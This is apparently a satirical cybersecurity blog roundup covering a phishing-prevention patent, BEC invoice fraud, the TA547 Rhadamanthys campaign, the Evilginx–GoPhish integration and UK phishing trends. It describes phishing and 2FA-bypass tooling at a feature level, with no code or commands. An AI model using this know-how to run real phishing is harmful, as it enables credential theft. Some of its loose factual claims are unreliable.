Patent US11496512B2
Patent US11483343B2
Patent US20220232015A1 / Preventing cloud-based phishing attacks using shared documents with malicious links
Another patent that promises to revolutionize the thrilling world of network security with US20220232015A1. Brace yourselves for a riveting tale of inline proxies, synthetic requests, and the ever-so-captivating inline metadata generation logic. It’s like the Avengers, but instead of superheroes, we have network security components saving the day.
It’s essentially a glorified bouncer for your corporate network, deciding which document files get to strut down the digital red carpet and which ones get the boot. This system, armed with an inline proxy (because apparently, «inline» makes anything sound more tech-savvy), stands guard between the cloud and the corporate network like a knight in shining armor—except it’s fighting off data packets instead of dragons.
This system doesn’t just blindly swing its sword at anything that moves. Oh no, it’s got finesse. It identifies document files trying to sneak into the corporate network using «various methods and metadata, » which is a fancy way of saying it’s really nosy and likes to snoop around. And then, like a judgy gatekeeper, it categorizes these documents into three cliques: the sanctioned (the cool kids allowed in without a fuss), the blacklisted (the troublemakers permanently exiled to the land of «Access Denied»), and the unknown (the mysterious strangers who need a thorough background check).
The patent goes on to wax poetic about the use of policy-based rules, threat scanning, and sandboxing for those unknown or potentially malicious documents. Because nothing says «cutting-edge technology» like treating every document like it’s a ticking time bomb.
Let’s dive into this page-turner, shall we?
First off, we have the «Network Security System, » a groundbreaking invention that—hold your applause—acts as a middleman between clients and cloud applications. Because if there’s anything we need, it’s more intermediaries in our lives, right? This system is so dedicated to enhancing security in cloud-based environments that it practically wears a cape.
Next up, «Synthetic Request Generation.» The system doesn’t just handle requests; oh no, it creates its own. Because why wait for trouble when you can conjure it up yourself? It’s like inviting a vampire into your house just to see if your garlic wreath works.
And let’s not forget the «Inline Metadata Generation Logic.» This isn’t just any logic; it’s inline, which means… something very important, no doubt. It’s configured to issue synthetic requests, adding an extra layer of complexity because, clearly, what our lives lack is complexity.
Then there’s the «Separate Synthetic Requests.» Because why have one type of synthetic request when you can have two? Variety is the spice of life, after all. This technology is like having a decoy duck in a pond full of real ducks, except the ducks are data, and no one’s really sure why we need the decoy in the first place.
Ah, «Cloud Policy Enforcement, » the pièce de résistance. The synthetic request injection is used to retrieve metadata for cloud policy enforcement, suggesting that, yes, we can enforce policies in cloud applications. Because if there’s one thing cloud applications were missing, it was more policies.
Now, for the grand finale: the benefits and drawbacks.
Benefits:
🗣"Enhanced Security»: Because before this patent, everyone was just winging it.
🗣"Proactive Threat Detection»: It’s like Minority Report for your network, but without Tom Cruise.
🗣"Dynamic Policy Enforcement»: Finally, a way to enforce those policies dynamically. Static policy enforcement is so 2020.
🗣"Efficiency»: Because nothing says efficiency like generating synthetic requests to test your own system.
🗣"Stability and Consistency»: Because if there’s one thing we crave in the fast-paced world of IT, it’s stability. Yawn.
Drawbacks:
🗣"Complexity»: Who would’ve thought adding several layers of synthetic requests and metadata logic would make things more complex?
🗣"False Positives/Negatives»: Surprise! The system that invents its own problems sometimes gets it wrong.
🗣"Maintenance and Updates»: Because the one thing IT departments complain about not having enough of is maintenance work.
🗣"User Experience Impact»: Because nothing enhances user experience quite like being told your legitimate document is a security threat.
🗣"Over-Reliance on Known Threats»: Because who needs to worry about unknown threats when you can just keep focusing on the ones you already know?
So there you have it, folks. Patent US20220232015A1 is set to revolutionize the way we think about network security, turning the mundane task of document file management into a saga worthy of its own epic trilogy. Move over, Lord of the Rings; there’s a new tale of adventure in town, complete with inline proxies, metadata, and the ever-thrilling sandboxing. Who knew network security could be so… exhilarating?
Unpacking in more detail
FBI IC3
Attackers are employing a variety of methods, including phishing emails with malicious attachments, obfuscated script files, and Guloader PowerShell, to infiltrate and compromise victim systems. Invoice fraud, a form of business email compromise (BEC), is one of the popular methods used by attackers to deceive victims. In this type of scam, a third party requests payment fraudulently, often by impersonating a legitimate vendor
Invoice scams pose a significant threat to businesses, as they can result in substantial financial losses and irreparable damage. According to the FBI IC3 report, in 2022, BEC attacks caused $2.7 billion in losses to US victims, making it the most pervasive form of business email compromise.
Some indicators of fraudulent email invoices include requests for personally identifiable information (PII), unusual requests such as changes to banking or payment information, and invoices with unusual dollar amounts. Additionally, attackers often use obfuscation techniques to evade defenses and make their malicious activities more difficult to detect.
TA547 phishing campaign
The TA547 phishing campaign using the Rhadamanthys stealer represents a significant evolution in cybercriminal tactics, notably through the integration of AI-generated scripts. This development serves as a critical reminder for organizations to continuously update and adapt their cybersecurity strategies to counter sophisticated and evolving threats.
Key Details of the Attack
📌Impersonation and Email Content: The phishing emails were crafted to impersonate the German company Metro AG, presenting themselves as invoice-related communications. These emails contained a password-protected ZIP file, which when opened, triggered a remote PowerShell script
📌Execution Method: The PowerShell script executed directly in memory, deploying the Rhadamanthys stealer without writing to the disk. This method helps avoid detection by traditional antivirus software
📌Use of AI in Malware Creation: There is a strong indication that the PowerShell script was generated or at least refined using a large language model (LLM). The script featured grammatically correct and highly specific comments, which is atypical for human-generated malware scripts
Evolving Tactics and Techniques
📌Innovative Lures and Delivery Methods: The campaign also experimented with new phishing tactics, such as voice message notifications and SVG image embedding, to enhance the effectiveness of credential harvesting attacks
📌AI and Cybercrime: The use of AI technologies like ChatGPT or CoPilot in scripting the malware indicates a significant shift in cybercrime tactics, suggesting that cybercriminals are increasingly leveraging AI to refine their attack methods
📌Broader Implications: This campaign not only highlights the adaptability and technical sophistication of TA547 but also underscores the broader trend of cybercriminals integrating AI tools into their operations. This integration could potentially lead to more effective and harder-to-detect cyber threats
Recommendations for Defense
📌Employee Training: Organizations should enhance their cybersecurity defenses by training employees to recognize phishing attempts and suspicious email content
📌Technical Safeguards: Implementing strict group policies to restrict traffic from unknown sources and ad networks can help protect endpoints from such attacks
📌Behavior-Based Detection: Despite the use of AI in crafting attacks, behavior-based detection mechanisms remain effective in identifying and mitigating such threats
Evilginx + GoPhish
The article from BreakDev discusses the integration of Evilginx 3.3 with GoPhish, a significant update that enhances phishing campaign capabilities. These updates to Evilginx and its integration with GoPhish represent significant advancements in phishing campaign technology, offering users more sophisticated tools for creating and managing phishing attempts with enhanced customization and tracking capabilities.
Here are the key points and new features introduced:
📌Integration with GoPhish: Evilginx now officially integrates with GoPhish by Jordan Wright. This collaboration allows users to create phishing campaigns that send emails with valid Evilginx lure URLs, leveraging GoPhish’s user interface to monitor the campaign’s effectiveness, including email opens, lure URL clicks, and successful session captures.
📌API Enhancements: The update has introduced additional API endpoints in GoPhish, enabling changes to the results status for every sent email. This improvement facilitates more dynamic and responsive campaign management.
📌Lure URL Generation: In the new workflow, when creating a campaign in GoPhish, users no longer select a «Landing Page.» Instead, they generate a lure URL in Evilginx and input it into the «Evilginx Lure URL» text box. This process streamlines the creation of phishing campaigns.
📌Custom Parameters and Personalization: GoPhish automatically generates encrypted custom parameters with personalized content for each link embedded in the generated email messages. These parameters include the recipient’s first name, last name, and email. This feature allows for the customization of phishing pages through js_inject scripts, enhancing the effectiveness of phishing attempts.
📌Expanded TLD Support: Evilginx has expanded its support for new Top-Level Domains (TLDs) to improve the efficiency of URL detection in proxied packets. This update aims to better differentiate between phishing and original domains by recognizing URLs ending with a broader range of known TLDs. The updated list includes a variety of TLDs, such as .aero, .arpa, .biz, .cloud, .gov, .info, .net, .org, and many others, including all known 2-character TLDs.
**
Evilginx and GoPhish are tools used in cybersecurity, particularly in the context of phishing simulations and man-in-the-middle (MitM) attack frameworks. They serve different purposes but can be used together to enhance phishing campaigns and security testing.
📌Evilginx is a man-in-the-middle attack framework that can bypass two-factor authentication (2FA) mechanisms.
- It works by tricking a user into visiting a proxy site that looks like the legitimate site they intend to visit. As the user logs in and completes the 2FA challenge, Evilginx captures the user’s login information and the authentication token.
- This method allows the attacker to replay the token and access the targeted service as the user, effectively bypassing 2FA protections.
📌GoPhish is an open-source phishing toolkit designed for businesses and security professionals to conduct security awareness training and phishing simulation exercises.
- It allows users to create and track the effectiveness of phishing campaigns, including email opens, link clicks, and data submission on phishing pages.
Phishing in UK
Phishing attacks are on the rise in the UK, and it seems our cybercriminal friends have been busy updating their deception toolkit. They’re no longer just sending out those fancy «I’m the deposed prince» emails. No, they switched to high technology, plunging into the exciting world of QR phishing (or «quishing», because apparently everything is better with «q») and even connecting artificial intelligence to write these such convincing fraudulent emails.
And for those who thought QR codes were just a harmless way to download a restaurant menu, think again. They’re the new golden ticket for scammers on social media, preying on the unsuspecting masses looking for concert tickets or the next big sale. Meanwhile, AI is making it easier than ever to fake someone’s identity, because who needs real fingerprints or faces anymore?
Let’s start with the classic «vishing» call centers, where enterprising scammers in Ukraine and the Czech Republic put on their best British accents to convince you to send them a bit of pocket change—just tens of millions of euros. Who knew that the voice on the other end of the phone asking for your bank details was actually Boris in Praha, not Barclays in Knightsbridge?
Then there’s the hospitality hustle, where hotel employees are duped by emails that are about as genuine as a three-pound note. Click on this link, and voila! You’ve just given a hacker a five-star stay in your computer system.
And let’s not forget the good old United States Postal Service, or as the scammers would have it, the «United Scams Phishing Service.» They’ve been sending out emails that are so convincing you’d think Mr. Postman himself was asking for your details. Except instead of delivering parcels, they’re parceling out your personal info to the highest bidder.
Over in the world of UK transport, it seems some employees couldn’t spot a phishing attack if it came with a side of chips. An email with a fake portal link was all it took to turn their mailboxes into an all-you-can-eat data buffet.
But wait, there’s more! The latest trend is «quishing, » where QR codes are the new black for cyber swindlers. Because nothing says «trust me» like scanning a mysterious barcode that promises a package delivery but delivers a package of malware instead.
Law firms aren’t immune to the phishing frenzy either. One click is on a dodgy link, and suddenly you’re not just practicing law, you’re practicing how to explain to your clients why their confidential information is now trending on the dark web.
Job seekers, beware the WhatsApp wiles, where scammers are offering you the job of a lifetime—so long as your lifetime dream was to be part of a fraud scheme.
Small business, you are not small enough to be noticed! In fact, you are the star of the show, and a whopping 82% of online threats concern only you. And let’s applaud for the 464% increase in the number of phishing attacks in your industry.
And who is on the front line of the fight against this digital epidemic? The National Cyber Security Center (NCSC) and Action Fraud, armed with their powerful resources, are helping the public report these dastardly acts. Because nothing says «we have everything under control» like a government website and a hotline.
The UK government has rolled out the red carpet for the «world’s first» charter with tech giants, promising to block and remove fraudulent content. Because if there’s one thing that will deter scammers, it’s a clearly worded team agreement with the National Crime Agency (NCA) and the Cybercrime Division.
Education and awareness are touted as «silver bullets» against this growing threat. Various organizations offer phishing awareness courses because watching a PowerPoint presentation is a sure way to defeat sophisticated cybercriminals. And let’s not forget about international cooperation, because phishing, like a severe cold, knows no boundaries.
So, as we wrap up this festive phishing roundup, remember: if it looks like a scam and smells like a scam, it’s probably just another day on the internet. Keep your wits about you, and maybe don’t click on that link from «Her Majesty’s Secret Service» promising you a tax refund in Poundcoin.
Unpacking in more detail
Blizzard attacks
«Star Blizzard» should not be confused with a celestial weather phenomenon or a limited-edition threat from the Dairy Queen. This saga takes place in a digital space where the only snowflakes are the unique identifiers of each hacked system.
The audacity of Blizzard, which conducts targeted social engineering attacks on Microsoft Teams using ready-made infrastructure against everyone who uses it. The group has been doing this since November 2023, remaining unnoticed until January 12, 2024. And not just sneaking around, but camping, making a bonfire in your digital backyard while you serenely watched your favorite TV series.
❇️Imagine, if you will, the finance industry, with all its high-stakes and even higher egos, getting a digital pie to the face courtesy of our mischievous friends at Star Blizzard. «Oh, what’s this? Another 'urgent' wire transfer request from the CEO who’s currently on a safari? Sure, let’s expedite that!»
❇️Then there’s the healthcare sector, tirelessly working to save lives, only to have their systems held hostage by a cyberattack. «We’ve encrypted your files, but think of this as a team-building exercise. How quickly can you work together to get them back?» It’s like a game of Operation, but the only buzzing sound is the collective panic of the IT department.
❇️Let’s not forget the government agencies, those bastions of bureaucracy, where a single phishing email can lead to the kind of chaos. «Oops, did we accidentally leak classified documents? Our bad. But hey, transparency is important, right?»
❇️And of course, the retail industry, where the point-of-sale systems are as vulnerable as a house of cards in a wind tunnel. «Black Friday sale! Everything must go! Including your credit card details!»
In the world of cybersecurity, where the stakes are high and the attackers are always looking for the next weak link, it’s a wonder that any industry can keep a straight face. So, let’s all have a nervous chuckle and then maybe, just maybe, update those passwords.
Unpacking in more detail